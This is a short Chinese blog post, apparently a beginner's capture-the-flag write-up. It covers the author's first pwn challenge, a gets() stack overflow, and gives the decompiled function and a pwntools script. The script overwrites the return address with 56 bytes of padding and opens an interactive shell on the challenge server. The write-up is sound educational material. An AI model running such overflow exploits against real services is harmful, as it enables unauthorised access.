zoukankan      html  css  js  c++  java
  • 第一解出的pwn题

    虽然题目不难,但是 是我第一次做出的pwn题,得写下。

    __int64 sub_4007E6()
    {
      char s1; // [sp+0h] [bp-30h]@1
    
      memset(&s1, 0, 0x30uLL);
      puts("Input your Name:");
      gets(&s1);
      if ( strcmp(&s1, "root") )
        ::s1 = strdup(&s1);
      return 0LL;
    }

    这里有溢出点。s1。

    然后就很明确了。就差溢出的地址和覆盖多少了。

    然后看了好久,看不出来。果断就调试,然后就直接出来了。

    剩下就直接上代码了,过程有点想哭。。。还好有师傅给指点了下。

    将p.sendline("whoami")
    改成了p.interactive()
    from pwn import *
    re_add=0x0000000000400896
    for i in range(10000):
        #p=process("./whoami")
        p=remote("101.71.29.5",10013)
        payload='A'*56+p64(re_add)
        p.recvuntil(">")
        p.sendline("1")
        p.recvuntil("Input your Name:
    ")
        p.sendline(payload)
        p.interactive()
        p.close()

    起初想爆破的。但没成功。。。所以就。。。

    代码有点难看。。下次练下 写好点

  • 相关阅读:
    TCMalloc 内存分配原理简析
    技术人沟通中的几个常见问题
    不同路径
    Js将字符串转数字的方式
    防抖节流模式
    Location对象
    React生命周期
    fgrep命令
    数据访问对象模式
    保持城市天际线
  • 原文地址:https://www.cnblogs.com/liyuechan/p/9862811.html
Copyright © 2011-2022 走看看